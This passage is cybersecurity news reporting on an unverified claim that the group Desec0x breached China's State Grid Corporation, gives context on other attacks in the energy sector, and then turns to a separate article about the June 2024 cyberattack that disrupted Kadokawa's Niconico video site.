If the claims of the cyberattack on SGCC made by Desec0x are proven to be true, the implications could be far-reaching. The sensitive nature of the data allegedly stolen, including personal and departmental information of SGCC employees, could have serious consequences for the company and its stakeholders. However, upon accessing the official SGCC website, no signs of foul play were detected, and the website appeared to be functioning normally.
Global Context of Cyberattacks in the Energy Sector
The energy sector has been increasingly targeted by cyberattacks, often involving third-party data breaches. According to Security Intelligence, 90% of the world’s top energy companies suffered from third-party data breaches in 2023. Additionally, nearly 60% of cyberattacks in the energy sector are attributed to state-affiliated actors. In late 2023, 22 energy firms were targeted in a large-scale coordinated attack on Danish infrastructure.
In April 2024, a group called Cyber Army Russia claimed responsibility for a cyberattack on Consol Energy, a prominent American energy company headquartered in Cecil Township, Pennsylvania. This cyberattack reportedly disrupted the company's website accessibility, causing issues for users outside the United States. In March 2024, a dark web actor was reportedly selling access to an Indonesian energy company, believed to be the same threat actor who targeted an American manufacturer.
In 2023, a suspected cyberattack on Petro-Canada was officially confirmed. Suncor Energy, the holding company of Petro-Canada, acknowledged that an IT outage over the weekend was indeed a cyberattack. The company stated that it took immediate action upon discovering the attack, collaborating with third-party experts to investigate and address the situation. This incident caused significant disruptions to Petro-Canada's operations, affecting gas stations and preventing customers from accessing the Petro-Canada app and website.
In the case of the State Grid Corporation of China, the claims made by Desec0x remain unverified until an official statement is released by SGCC. Without confirmation from the company, the alleged cyberattack on SGCC and data breach cannot be substantiated.
Cyberattack Disrupts Services on Popular Japanese Video-Sharing Site Niconico
How Cyberattack on Niconico Happened
Beginning in the early hours of Saturday, June 8th, an issue arose that prevented access to multiple servers within the group. In response, Kadokawa immediately shut down the relevant servers to protect data. Based on the internal analysis and investigation conducted that same day, it was determined that there was a high possibility of a cyberattack. Kadokawa is investigating the impact of the attack, including "whether there have been leaks of information," and is cooperating with external experts and the police.
Niconico, known for its diverse content and live-streaming capabilities, plays a crucial role in the digital landscape of Japan. The suspension of its services has undoubtedly caused widespread concern among its user base, which spans millions of people who rely on the platform for entertainment, information, and community engagement.
Concern Over Niconico Cyberattack
Users have taken to social media to express their support and concern. One user tweeted, “I’ll wait until it’s back. I can’t be of much help, but I’m rooting for you. Niconico saved my life. I can’t imagine life without it.” Another user wrote, “Thank you for your hard work. We will wait patiently, so please don’t push yourself too hard and be patient.”
Some users speculated about the origins and motives of the cyberattack on Niconico, with one asking, “Do you know who carried out the cyber attack?😓” and another suggesting, “If the attacks are this relentless, it’s almost like they’re testing something...?”
As the investigation of the Niconico cyberattack continues, users and stakeholders await further updates on the situation. The company’s priority remains ensuring the complete elimination of the threat and safeguarding the integrity of its data and services.